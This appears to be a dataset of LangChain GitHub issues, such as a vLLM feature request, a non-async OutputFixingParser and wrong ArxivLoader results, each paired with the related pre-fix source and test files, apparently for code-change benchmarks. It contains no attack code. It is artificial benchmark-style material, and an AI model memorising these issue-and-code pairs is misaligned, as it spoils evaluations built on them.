from langchain.prompts import ChatPromptTemplate, HumanMessagePromptTemplate
from pydantic import BaseModel, Field
class Dog(BaseModel):
\"\"\"Identifying information about a dog.\"\"\"
name: str = Field(..., description="The dog's name")
color: str = Field(..., description="The dog's color")
fav_food: Optional[str] = Field(None, description="The dog's favorite food")
llm = ChatOpenAI(model="gpt-3.5-turbo-0613", temperature=0)
prompt_msgs = [
SystemMessage(
content="You are a world class algorithm for extracting information in structured formats."
),
HumanMessage(content="Use the given format to extract information from the following input:"),
HumanMessagePromptTemplate.from_template("{input}"),
HumanMessage(content="Tips: Make sure to answer in the correct format"),
]
prompt = ChatPromptTemplate(messages=prompt_msgs)
chain = create_structured_output_chain(Dog, llm, prompt)
chain.run("Harry was a chubby brown beagle who loved chicken")
# -> Dog(name="Harry", color="brown", fav_food="chicken")
""" # noqa: E501
if isinstance(output_schema, dict):
function: Any = {
"name": "output_formatter",
"description": (
"Output formatter. Should always be used to format your response to the"
" user."
),
"parameters": output_schema,
}
else:
class _OutputFormatter(BaseModel):
"""Output formatter. Should always be used to format your response to the user.""" # noqa: E501
output: output_schema # type: ignore
function = _OutputFormatter
output_parser = output_parser or PydanticAttrOutputFunctionsParser(
pydantic_schema=_OutputFormatter, attr_name="output"
)
return create_openai_fn_chain(
[function], llm, prompt, output_parser=output_parser, **kwargs
)
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,729 | VLLM | ### Feature request
can we please get vllm support for faster inference
### Motivation
faster inference speed compared to using hugging face pipeline
### Your contribution
n/a | https://github.com/langchain-ai/langchain/issues/8729 | https://github.com/langchain-ai/langchain/pull/8806 | 100d9ce4c7b55db0c9df973a26bbc18d5ad5800c | a616e19975796ff6e3cde24597ba90eee714d57a | "2023-08-04T00:45:38Z" | python | "2023-08-07T14:32:02Z" | docs/extras/integrations/llms/vllm.ipynb | |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,729 | VLLM | ### Feature request
can we please get vllm support for faster inference
### Motivation
faster inference speed compared to using hugging face pipeline
### Your contribution
n/a | https://github.com/langchain-ai/langchain/issues/8729 | https://github.com/langchain-ai/langchain/pull/8806 | 100d9ce4c7b55db0c9df973a26bbc18d5ad5800c | a616e19975796ff6e3cde24597ba90eee714d57a | "2023-08-04T00:45:38Z" | python | "2023-08-07T14:32:02Z" | libs/langchain/langchain/llms/__init__.py | """
**LLM** classes provide
access to the large language model (**LLM**) APIs and services.
**Class hierarchy:**
.. code-block::
BaseLanguageModel --> BaseLLM --> LLM --> <name> # Examples: AI21, HuggingFaceHub, OpenAI
**Main helpers:**
.. code-block::
LLMResult, PromptValue,
CallbackManagerForLLMRun, AsyncCallbackManagerForLLMRun,
CallbackManager, AsyncCallbackManager,
AIMessage, BaseMessage
""" # noqa: E501
from typing import Dict, Type
from langchain.llms.ai21 import AI21
from langchain.llms.aleph_alpha import AlephAlpha
from langchain.llms.amazon_api_gateway import AmazonAPIGateway
from langchain.llms.anthropic import Anthropic
from langchain.llms.anyscale import Anyscale
from langchain.llms.aviary import Aviary
from langchain.llms.azureml_endpoint import AzureMLOnlineEndpoint
from langchain.llms.bananadev import Banana
from langchain.llms.base import BaseLLM
from langchain.llms.baseten import Baseten
from langchain.llms.beam import Beam
from langchain.llms.bedrock import Bedrock
from langchain.llms.cerebriumai import CerebriumAI
from langchain.llms.chatglm import ChatGLM
from langchain.llms.clarifai import Clarifai
from langchain.llms.cohere import Cohere
from langchain.llms.ctransformers import CTransformers
from langchain.llms.databricks import Databricks
from langchain.llms.deepinfra import DeepInfra
from langchain.llms.edenai import EdenAI
from langchain.llms.fake import FakeListLLM
from langchain.llms.fireworks import Fireworks, FireworksChat
from langchain.llms.forefrontai import ForefrontAI
from langchain.llms.google_palm import GooglePalm
from langchain.llms.gooseai import GooseAI
from langchain.llms.gpt4all import GPT4All
from langchain.llms.huggingface_endpoint import HuggingFaceEndpoint
from langchain.llms.huggingface_hub import HuggingFaceHub
from langchain.llms.huggingface_pipeline import HuggingFacePipeline
from langchain.llms.huggingface_text_gen_inference import HuggingFaceTextGenInference
from langchain.llms.human import HumanInputLLM
from langchain.llms.koboldai import KoboldApiLLM
from langchain.llms.llamacpp import LlamaCpp
from langchain.llms.manifest import ManifestWrapper
from langchain.llms.minimax import Minimax
from langchain.llms.mlflow_ai_gateway import MlflowAIGateway
from langchain.llms.modal import Modal
from langchain.llms.mosaicml import MosaicML
from langchain.llms.nlpcloud import NLPCloud
from langchain.llms.octoai_endpoint import OctoAIEndpoint
from langchain.llms.openai import AzureOpenAI, OpenAI, OpenAIChat
from langchain.llms.openllm import OpenLLM
from langchain.llms.openlm import OpenLM
from langchain.llms.petals import Petals
from langchain.llms.pipelineai import PipelineAI
from langchain.llms.predibase import Predibase
from langchain.llms.predictionguard import PredictionGuard
from langchain.llms.promptlayer_openai import PromptLayerOpenAI, PromptLayerOpenAIChat
from langchain.llms.replicate import Replicate
from langchain.llms.rwkv import RWKV
from langchain.llms.sagemaker_endpoint import SagemakerEndpoint
from langchain.llms.self_hosted import SelfHostedPipeline
from langchain.llms.self_hosted_hugging_face import SelfHostedHuggingFaceLLM
from langchain.llms.stochasticai import StochasticAI
from langchain.llms.textgen import TextGen
from langchain.llms.tongyi import Tongyi
from langchain.llms.vertexai import VertexAI
from langchain.llms.writer import Writer
from langchain.llms.xinference import Xinference
__all__ = [
"AI21",
"AlephAlpha",
"AmazonAPIGateway",
"Anthropic",
"Anyscale",
"Aviary",
"AzureMLOnlineEndpoint",
"AzureOpenAI",
"Banana",
"Baseten",
"Beam",
"Bedrock",
"CTransformers",
"CerebriumAI",
"ChatGLM",
"Clarifai",
"Cohere",
"Databricks",
"DeepInfra",
"EdenAI",
"FakeListLLM",
"Fireworks",
"FireworksChat",
"ForefrontAI",
"GPT4All",
"GooglePalm",
"GooseAI",
"HuggingFaceEndpoint",
"HuggingFaceHub",
"HuggingFacePipeline",
"HuggingFaceTextGenInference",
"HumanInputLLM",
"KoboldApiLLM",
"LlamaCpp",
"TextGen",
"ManifestWrapper",
"Minimax",
"MlflowAIGateway",
"Modal",
"MosaicML",
"NLPCloud",
"OpenAI",
"OpenAIChat",
"OpenLLM",
"OpenLM",
"Petals",
"PipelineAI",
"Predibase",
"PredictionGuard",
"PromptLayerOpenAI",
"PromptLayerOpenAIChat",
"RWKV",
"Replicate",
"SagemakerEndpoint",
"SelfHostedHuggingFaceLLM",
"SelfHostedPipeline",
"StochasticAI",
"Tongyi",
"VertexAI",
"Writer",
"OctoAIEndpoint",
"Xinference",
]
type_to_cls_dict: Dict[str, Type[BaseLLM]] = {
"ai21": AI21,
"aleph_alpha": AlephAlpha,
"amazon_api_gateway": AmazonAPIGateway,
"amazon_bedrock": Bedrock,
"anthropic": Anthropic,
"anyscale": Anyscale,
"aviary": Aviary,
"azure": AzureOpenAI,
"azureml_endpoint": AzureMLOnlineEndpoint,
"bananadev": Banana,
"baseten": Baseten,
"beam": Beam,
"cerebriumai": CerebriumAI,
"chat_glm": ChatGLM,
"clarifai": Clarifai,
"cohere": Cohere,
"ctransformers": CTransformers,
"databricks": Databricks,
"deepinfra": DeepInfra,
"edenai": EdenAI,
"fake-list": FakeListLLM,
"forefrontai": ForefrontAI,
"google_palm": GooglePalm,
"gooseai": GooseAI,
"gpt4all": GPT4All,
"huggingface_endpoint": HuggingFaceEndpoint,
"huggingface_hub": HuggingFaceHub,
"huggingface_pipeline": HuggingFacePipeline,
"huggingface_textgen_inference": HuggingFaceTextGenInference,
"human-input": HumanInputLLM,
"koboldai": KoboldApiLLM,
"llamacpp": LlamaCpp,
"textgen": TextGen,
"minimax": Minimax,
"mlflow-ai-gateway": MlflowAIGateway,
"modal": Modal,
"mosaic": MosaicML,
"nlpcloud": NLPCloud,
"openai": OpenAI,
"openlm": OpenLM,
"petals": Petals,
"pipelineai": PipelineAI,
"predibase": Predibase,
"replicate": Replicate,
"rwkv": RWKV,
"sagemaker_endpoint": SagemakerEndpoint,
"self_hosted": SelfHostedPipeline,
"self_hosted_hugging_face": SelfHostedHuggingFaceLLM,
"stochasticai": StochasticAI,
"tongyi": Tongyi,
"vertexai": VertexAI,
"openllm": OpenLLM,
"openllm_client": OpenLLM,
"writer": Writer,
"xinference": Xinference,
}
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,729 | VLLM | ### Feature request
can we please get vllm support for faster inference
### Motivation
faster inference speed compared to using hugging face pipeline
### Your contribution
n/a | https://github.com/langchain-ai/langchain/issues/8729 | https://github.com/langchain-ai/langchain/pull/8806 | 100d9ce4c7b55db0c9df973a26bbc18d5ad5800c | a616e19975796ff6e3cde24597ba90eee714d57a | "2023-08-04T00:45:38Z" | python | "2023-08-07T14:32:02Z" | libs/langchain/langchain/llms/vllm.py | |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 7,989 | OutputFixingParser is not async | ### System Info
LangChain Python v0.0.237
Based on this code snippet it appears that OutputFixingParser doesn't support async flows.
https://github.com/hwchase17/langchain/blob/df84e1bb64d96377f909651f696f310c43c2f2c5/langchain/output_parsers/fix.py#L46-L52
It's calling the run function and not arun
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [X] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [X] Async
### Reproduction
1. Define async callback handler
2. Make LLM return output that is unparsable (invalid JSON or 2 code blocks)
3. OutputFixingParser will fail parsing the output and throw an exception, which will call the LLM via the run function which doesn't await on coroutines. Python will give the following error:
```
RuntimeWarning: coroutine 'AsyncCallbackHandler.on_chat_model_start' was never awaited
```
### Expected behavior
1. Should work with coroutines as expected | https://github.com/langchain-ai/langchain/issues/7989 | https://github.com/langchain-ai/langchain/pull/8776 | cc908d49a3c23e128fab7c89fa45d7cc4114f028 | 33cdb06b5c9d4d3e7f54d5e1e7c980dfae33923b | "2023-07-20T08:29:12Z" | python | "2023-08-07T21:42:48Z" | libs/langchain/langchain/output_parsers/fix.py | from __future__ import annotations
from typing import TypeVar
from langchain.chains.llm import LLMChain
from langchain.output_parsers.prompts import NAIVE_FIX_PROMPT
from langchain.schema import BaseOutputParser, BasePromptTemplate, OutputParserException
from langchain.schema.language_model import BaseLanguageModel
T = TypeVar("T")
class OutputFixingParser(BaseOutputParser[T]):
"""Wraps a parser and tries to fix parsing errors."""
@property
def lc_serializable(self) -> bool:
return True
parser: BaseOutputParser[T]
retry_chain: LLMChain
@classmethod
def from_llm(
cls,
llm: BaseLanguageModel,
parser: BaseOutputParser[T],
prompt: BasePromptTemplate = NAIVE_FIX_PROMPT,
) -> OutputFixingParser[T]:
"""Create an OutputFixingParser from a language model and a parser.
Args:
llm: llm to use for fixing
parser: parser to use for parsing
prompt: prompt to use for fixing
Returns:
OutputFixingParser
"""
chain = LLMChain(llm=llm, prompt=prompt)
return cls(parser=parser, retry_chain=chain)
def parse(self, completion: str) -> T:
try:
parsed_completion = self.parser.parse(completion)
except OutputParserException as e:
new_completion = self.retry_chain.run(
instructions=self.parser.get_format_instructions(),
completion=completion,
error=repr(e),
)
parsed_completion = self.parser.parse(new_completion)
return parsed_completion
def get_format_instructions(self) -> str:
return self.parser.get_format_instructions()
@property
def _type(self) -> str:
return "output_fixing"
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 7,989 | OutputFixingParser is not async | ### System Info
LangChain Python v0.0.237
Based on this code snippet it appears that OutputFixingParser doesn't support async flows.
https://github.com/hwchase17/langchain/blob/df84e1bb64d96377f909651f696f310c43c2f2c5/langchain/output_parsers/fix.py#L46-L52
It's calling the run function and not arun
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [X] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [X] Async
### Reproduction
1. Define async callback handler
2. Make LLM return output that is unparsable (invalid JSON or 2 code blocks)
3. OutputFixingParser will fail parsing the output and throw an exception, which will call the LLM via the run function which doesn't await on coroutines. Python will give the following error:
```
RuntimeWarning: coroutine 'AsyncCallbackHandler.on_chat_model_start' was never awaited
```
### Expected behavior
1. Should work with coroutines as expected | https://github.com/langchain-ai/langchain/issues/7989 | https://github.com/langchain-ai/langchain/pull/8776 | cc908d49a3c23e128fab7c89fa45d7cc4114f028 | 33cdb06b5c9d4d3e7f54d5e1e7c980dfae33923b | "2023-07-20T08:29:12Z" | python | "2023-08-07T21:42:48Z" | libs/langchain/langchain/output_parsers/retry.py | from __future__ import annotations
from typing import TypeVar
from langchain.chains.llm import LLMChain
from langchain.prompts.prompt import PromptTemplate
from langchain.schema import (
BaseOutputParser,
BasePromptTemplate,
OutputParserException,
PromptValue,
)
from langchain.schema.language_model import BaseLanguageModel
NAIVE_COMPLETION_RETRY = """Prompt:
{prompt}
Completion:
{completion}
Above, the Completion did not satisfy the constraints given in the Prompt.
Please try again:"""
NAIVE_COMPLETION_RETRY_WITH_ERROR = """Prompt:
{prompt}
Completion:
{completion}
Above, the Completion did not satisfy the constraints given in the Prompt.
Details: {error}
Please try again:"""
NAIVE_RETRY_PROMPT = PromptTemplate.from_template(NAIVE_COMPLETION_RETRY)
NAIVE_RETRY_WITH_ERROR_PROMPT = PromptTemplate.from_template(
NAIVE_COMPLETION_RETRY_WITH_ERROR
)
T = TypeVar("T")
class RetryOutputParser(BaseOutputParser[T]):
"""Wraps a parser and tries to fix parsing errors.
Does this by passing the original prompt and the completion to another
LLM, and telling it the completion did not satisfy criteria in the prompt.
"""
parser: BaseOutputParser[T]
"""The parser to use to parse the output."""
retry_chain: LLMChain
"""The LLMChain to use to retry the completion."""
@classmethod
def from_llm(
cls,
llm: BaseLanguageModel,
parser: BaseOutputParser[T],
prompt: BasePromptTemplate = NAIVE_RETRY_PROMPT,
) -> RetryOutputParser[T]:
chain = LLMChain(llm=llm, prompt=prompt)
return cls(parser=parser, retry_chain=chain)
def parse_with_prompt(self, completion: str, prompt_value: PromptValue) -> T:
"""Parse the output of an LLM call using a wrapped parser.
Args:
completion: The chain completion to parse.
prompt_value: The prompt to use to parse the completion.
Returns:
The parsed completion.
"""
try:
parsed_completion = self.parser.parse(completion)
except OutputParserException:
new_completion = self.retry_chain.run(
prompt=prompt_value.to_string(), completion=completion
)
parsed_completion = self.parser.parse(new_completion)
return parsed_completion
def parse(self, completion: str) -> T:
raise NotImplementedError(
"This OutputParser can only be called by the `parse_with_prompt` method."
)
def get_format_instructions(self) -> str:
return self.parser.get_format_instructions()
@property
def _type(self) -> str:
return "retry"
class RetryWithErrorOutputParser(BaseOutputParser[T]):
"""Wraps a parser and tries to fix parsing errors.
Does this by passing the original prompt, the completion, AND the error
that was raised to another language model and telling it that the completion
did not work, and raised the given error. Differs from RetryOutputParser
in that this implementation provides the error that was raised back to the
LLM, which in theory should give it more information on how to fix it.
"""
parser: BaseOutputParser[T]
retry_chain: LLMChain
@classmethod
def from_llm(
cls,
llm: BaseLanguageModel,
parser: BaseOutputParser[T],
prompt: BasePromptTemplate = NAIVE_RETRY_WITH_ERROR_PROMPT,
) -> RetryWithErrorOutputParser[T]:
"""Create a RetryWithErrorOutputParser from an LLM.
Args:
llm: The LLM to use to retry the completion.
parser: The parser to use to parse the output.
prompt: The prompt to use to retry the completion.
Returns:
A RetryWithErrorOutputParser.
"""
chain = LLMChain(llm=llm, prompt=prompt)
return cls(parser=parser, retry_chain=chain)
def parse_with_prompt(self, completion: str, prompt_value: PromptValue) -> T:
try:
parsed_completion = self.parser.parse(completion)
except OutputParserException as e:
new_completion = self.retry_chain.run(
prompt=prompt_value.to_string(), completion=completion, error=repr(e)
)
parsed_completion = self.parser.parse(new_completion)
return parsed_completion
def parse(self, completion: str) -> T:
raise NotImplementedError(
"This OutputParser can only be called by the `parse_with_prompt` method."
)
def get_format_instructions(self) -> str:
return self.parser.get_format_instructions()
@property
def _type(self) -> str:
return "retry_with_error"
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 9,046 | ArxivLoader incorrect results | ### System Info
Latest pip versions
### Who can help?
@eyurtsev
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I tried searching by exact title in the following way:
```python
docs = ArxivLoader(query="MetaGPT: Meta Programming for Multi-Agent Collaborative Framework", load_max_docs=1).load()
```
But the result is incorrect. The search works properly on the arxiv website.
### Expected behavior
Correct paper returned | https://github.com/langchain-ai/langchain/issues/9046 | https://github.com/langchain-ai/langchain/pull/9061 | e94a5d753fe01aff1fa1592cd59d37fa64ef24a2 | fcbbddedaed196b0aa0377ca8c78b3410f62420f | "2023-08-10T15:18:24Z" | python | "2023-08-10T18:59:39Z" | libs/langchain/langchain/utilities/arxiv.py | """Util that calls Arxiv."""
import logging
import os
from typing import Any, Dict, List, Optional
from pydantic import BaseModel, root_validator
from langchain.schema import Document
logger = logging.getLogger(__name__)
class ArxivAPIWrapper(BaseModel):
"""Wrapper around ArxivAPI.
To use, you should have the ``arxiv`` python package installed.
https://lukasschwab.me/arxiv.py/index.html
This wrapper will use the Arxiv API to conduct searches and
fetch document summaries. By default, it will return the document summaries
of the top-k results.
It limits the Document content by doc_content_chars_max.
Set doc_content_chars_max=None if you don't want to limit the content size.
Attributes:
top_k_results: number of the top-scored document used for the arxiv tool
ARXIV_MAX_QUERY_LENGTH: the cut limit on the query used for the arxiv tool.
load_max_docs: a limit to the number of loaded documents
load_all_available_meta:
if True: the `metadata` of the loaded Documents contains all available
meta info (see https://lukasschwab.me/arxiv.py/index.html#Result),
if False: the `metadata` contains only the published date, title,
authors and summary.
doc_content_chars_max: an optional cut limit for the length of a document's
content
Example:
.. code-block:: python
from langchain.utilities.arxiv import ArxivAPIWrapper
arxiv = ArxivAPIWrapper(
top_k_results = 3,
ARXIV_MAX_QUERY_LENGTH = 300,
load_max_docs = 3,
load_all_available_meta = False,
doc_content_chars_max = 40000
)
arxiv.run("tree of thought llm)
"""
arxiv_search: Any #: :meta private:
arxiv_exceptions: Any # :meta private:
top_k_results: int = 3
ARXIV_MAX_QUERY_LENGTH = 300
load_max_docs: int = 100
load_all_available_meta: bool = False
doc_content_chars_max: Optional[int] = 4000
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that the python package exists in environment."""
try:
import arxiv
values["arxiv_search"] = arxiv.Search
values["arxiv_exceptions"] = (
arxiv.ArxivError,
arxiv.UnexpectedEmptyPageError,
arxiv.HTTPError,
)
values["arxiv_result"] = arxiv.Result
except ImportError:
raise ImportError(
"Could not import arxiv python package. "
"Please install it with `pip install arxiv`."
)
return values
def run(self, query: str) -> str:
"""
Performs an arxiv search and A single string
with the publish date, title, authors, and summary
for each article separated by two newlines.
If an error occurs or no documents found, error text
is returned instead. Wrapper for
https://lukasschwab.me/arxiv.py/index.html#Search
Args:
query: a plaintext search query
""" # noqa: E501
try:
results = self.arxiv_search( # type: ignore
query[: self.ARXIV_MAX_QUERY_LENGTH], max_results=self.top_k_results
).results()
except self.arxiv_exceptions as ex:
return f"Arxiv exception: {ex}"
docs = [
f"Published: {result.updated.date()}\n"
f"Title: {result.title}\n"
f"Authors: {', '.join(a.name for a in result.authors)}\n"
f"Summary: {result.summary}"
for result in results
]
if docs:
return "\n\n".join(docs)[: self.doc_content_chars_max]
else:
return "No good Arxiv Result was found"
def load(self, query: str) -> List[Document]:
"""
Run Arxiv search and get the article texts plus the article meta information.
See https://lukasschwab.me/arxiv.py/index.html#Search
Returns: a list of documents with the document.page_content in text format
Performs an arxiv search, downloads the top k results as PDFs, loads
them as Documents, and returns them in a List.
Args:
query: a plaintext search query
""" # noqa: E501
try:
import fitz
except ImportError:
raise ImportError(
"PyMuPDF package not found, please install it with "
"`pip install pymupdf`"
)
try:
results = self.arxiv_search( # type: ignore
query[: self.ARXIV_MAX_QUERY_LENGTH], max_results=self.load_max_docs
).results()
except self.arxiv_exceptions as ex:
logger.debug("Error on arxiv: %s", ex)
return []
docs: List[Document] = []
for result in results:
try:
doc_file_name: str = result.download_pdf()
with fitz.open(doc_file_name) as doc_file:
text: str = "".join(page.get_text() for page in doc_file)
except FileNotFoundError as f_ex:
logger.debug(f_ex)
continue
if self.load_all_available_meta:
extra_metadata = {
"entry_id": result.entry_id,
"published_first_time": str(result.published.date()),
"comment": result.comment,
"journal_ref": result.journal_ref,
"doi": result.doi,
"primary_category": result.primary_category,
"categories": result.categories,
"links": [link.href for link in result.links],
}
else:
extra_metadata = {}
metadata = {
"Published": str(result.updated.date()),
"Title": result.title,
"Authors": ", ".join(a.name for a in result.authors),
"Summary": result.summary,
**extra_metadata,
}
doc = Document(
page_content=text[: self.doc_content_chars_max], metadata=metadata
)
docs.append(doc)
os.remove(doc_file_name)
return docs
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 9,046 | ArxivLoader incorrect results | ### System Info
Latest pip versions
### Who can help?
@eyurtsev
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I tried searching by exact title in the following way:
```python
docs = ArxivLoader(query="MetaGPT: Meta Programming for Multi-Agent Collaborative Framework", load_max_docs=1).load()
```
But the result is incorrect. The search works properly on the arxiv website.
### Expected behavior
Correct paper returned | https://github.com/langchain-ai/langchain/issues/9046 | https://github.com/langchain-ai/langchain/pull/9061 | e94a5d753fe01aff1fa1592cd59d37fa64ef24a2 | fcbbddedaed196b0aa0377ca8c78b3410f62420f | "2023-08-10T15:18:24Z" | python | "2023-08-10T18:59:39Z" | libs/langchain/tests/integration_tests/document_loaders/test_arxiv.py | from typing import List
from langchain.document_loaders.arxiv import ArxivLoader
from langchain.schema import Document
def assert_docs(docs: List[Document]) -> None:
for doc in docs:
assert doc.page_content
assert doc.metadata
assert set(doc.metadata) == {"Published", "Title", "Authors", "Summary"}
def test_load_success() -> None:
"""Test that returns one document"""
loader = ArxivLoader(query="1605.08386", load_max_docs=2)
docs = loader.load()
assert len(docs) == 1
print(docs[0].metadata)
print(docs[0].page_content)
assert_docs(docs)
def test_load_returns_no_result() -> None:
"""Test that returns no docs"""
loader = ArxivLoader(query="1605.08386WWW", load_max_docs=2)
docs = loader.load()
assert len(docs) == 0
def test_load_returns_limited_docs() -> None:
"""Test that returns several docs"""
expected_docs = 2
loader = ArxivLoader(query="ChatGPT", load_max_docs=expected_docs)
docs = loader.load()
assert len(docs) == expected_docs
assert_docs(docs)
def test_load_returns_full_set_of_metadata() -> None:
"""Test that returns several docs"""
loader = ArxivLoader(query="ChatGPT", load_max_docs=1, load_all_available_meta=True)
docs = loader.load()
assert len(docs) == 1
for doc in docs:
assert doc.page_content
assert doc.metadata
assert set(doc.metadata).issuperset(
{"Published", "Title", "Authors", "Summary"}
)
print(doc.metadata)
assert len(set(doc.metadata)) > 4
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 9,046 | ArxivLoader incorrect results | ### System Info
Latest pip versions
### Who can help?
@eyurtsev
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I tried searching by exact title in the following way:
```python
docs = ArxivLoader(query="MetaGPT: Meta Programming for Multi-Agent Collaborative Framework", load_max_docs=1).load()
```
But the result is incorrect. The search works properly on the arxiv website.
### Expected behavior
Correct paper returned | https://github.com/langchain-ai/langchain/issues/9046 | https://github.com/langchain-ai/langchain/pull/9061 | e94a5d753fe01aff1fa1592cd59d37fa64ef24a2 | fcbbddedaed196b0aa0377ca8c78b3410f62420f | "2023-08-10T15:18:24Z" | python | "2023-08-10T18:59:39Z" | libs/langchain/tests/integration_tests/utilities/test_arxiv.py | """Integration test for Arxiv API Wrapper."""
from typing import Any, List
import pytest
from langchain.agents.load_tools import load_tools
from langchain.schema import Document
from langchain.tools.base import BaseTool
from langchain.utilities import ArxivAPIWrapper
@pytest.fixture
def api_client() -> ArxivAPIWrapper:
return ArxivAPIWrapper()
def test_run_success(api_client: ArxivAPIWrapper) -> None:
"""Test that returns the correct answer"""
output = api_client.run("1605.08386")
assert "Heat-bath random walks with Markov bases" in output
def test_run_returns_several_docs(api_client: ArxivAPIWrapper) -> None:
"""Test that returns several docs"""
output = api_client.run("Caprice Stanley")
assert "On Mixing Behavior of a Family of Random Walks" in output
def test_run_returns_no_result(api_client: ArxivAPIWrapper) -> None:
"""Test that gives no result."""
output = api_client.run("1605.08386WWW")
assert "No good Arxiv Result was found" == output
def assert_docs(docs: List[Document]) -> None:
for doc in docs:
assert doc.page_content
assert doc.metadata
assert set(doc.metadata) == {"Published", "Title", "Authors", "Summary"}
def test_load_success(api_client: ArxivAPIWrapper) -> None:
"""Test that returns one document"""
docs = api_client.load("1605.08386")
assert len(docs) == 1
assert_docs(docs)
def test_load_returns_no_result(api_client: ArxivAPIWrapper) -> None:
"""Test that returns no docs"""
docs = api_client.load("1605.08386WWW")
assert len(docs) == 0
def test_load_returns_limited_docs() -> None:
"""Test that returns several docs"""
expected_docs = 2
api_client = ArxivAPIWrapper(load_max_docs=expected_docs)
docs = api_client.load("ChatGPT")
assert len(docs) == expected_docs
assert_docs(docs)
def test_load_returns_limited_doc_content_chars() -> None:
"""Test that returns limited doc_content_chars_max"""
doc_content_chars_max = 100
api_client = ArxivAPIWrapper(doc_content_chars_max=doc_content_chars_max)
docs = api_client.load("1605.08386")
assert len(docs[0].page_content) == doc_content_chars_max
def test_load_returns_unlimited_doc_content_chars() -> None:
"""Test that returns unlimited doc_content_chars_max"""
doc_content_chars_max = None
api_client = ArxivAPIWrapper(doc_content_chars_max=doc_content_chars_max)
docs = api_client.load("1605.08386")
assert len(docs[0].page_content) == 54337
def test_load_returns_full_set_of_metadata() -> None:
"""Test that returns several docs"""
api_client = ArxivAPIWrapper(load_max_docs=1, load_all_available_meta=True)
docs = api_client.load("ChatGPT")
assert len(docs) == 1
for doc in docs:
assert doc.page_content
assert doc.metadata
assert set(doc.metadata).issuperset(
{"Published", "Title", "Authors", "Summary"}
)
print(doc.metadata)
assert len(set(doc.metadata)) > 4
def _load_arxiv_from_universal_entry(**kwargs: Any) -> BaseTool:
tools = load_tools(["arxiv"], **kwargs)
assert len(tools) == 1, "loaded more than 1 tool"
return tools[0]
def test_load_arxiv_from_universal_entry() -> None:
arxiv_tool = _load_arxiv_from_universal_entry()
output = arxiv_tool("Caprice Stanley")
assert (
"On Mixing Behavior of a Family of Random Walks" in output
), "failed to fetch a valid result"
def test_load_arxiv_from_universal_entry_with_params() -> None:
params = {
"top_k_results": 1,
"load_max_docs": 10,
"load_all_available_meta": True,
}
arxiv_tool = _load_arxiv_from_universal_entry(**params)
assert isinstance(arxiv_tool, ArxivAPIWrapper)
wp = arxiv_tool.api_wrapper
assert wp.top_k_results == 1, "failed to assert top_k_results"
assert wp.load_max_docs == 10, "failed to assert load_max_docs"
assert (
wp.load_all_available_meta is True
), "failed to assert load_all_available_meta"
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 1,733 | list index out of range error if similarity search gives 0 docs | https://github.com/hwchase17/langchain/blob/276940fd9babf8aec570dd869cc84fbca1c766bf/langchain/vectorstores/milvus.py#L319
I'm using milvus where for my question I'm getting 0 documents and so index out of range error occurs
Error line:
https://github.com/hwchase17/langchain/blob/276940fd9babf8aec570dd869cc84fbca1c766bf/langchain/chains/llm.py#L95 | https://github.com/langchain-ai/langchain/issues/1733 | https://github.com/langchain-ai/langchain/pull/5769 | c0acbdca1b5884ac90d17908fb2bb555a9ed9909 | 2184e3a4005f5c48126523cce92930fca6a31760 | "2023-03-17T11:14:48Z" | python | "2023-08-11T05:50:39Z" | libs/langchain/langchain/chains/llm.py | """Chain that just formats a prompt and calls an LLM."""
from __future__ import annotations
import warnings
from typing import Any, Dict, List, Optional, Sequence, Tuple, Union
from pydantic import Extra, Field
from langchain.callbacks.manager import (
AsyncCallbackManager,
AsyncCallbackManagerForChainRun,
CallbackManager,
CallbackManagerForChainRun,
Callbacks,
)
from langchain.chains.base import Chain
from langchain.load.dump import dumpd
from langchain.prompts.prompt import PromptTemplate
from langchain.schema import (
BaseLLMOutputParser,
BasePromptTemplate,
LLMResult,
PromptValue,
StrOutputParser,
)
from langchain.schema.language_model import BaseLanguageModel
from langchain.utils.input import get_colored_text
class LLMChain(Chain):
"""Chain to run queries against LLMs.
Example:
.. code-block:: python
from langchain import LLMChain, OpenAI, PromptTemplate
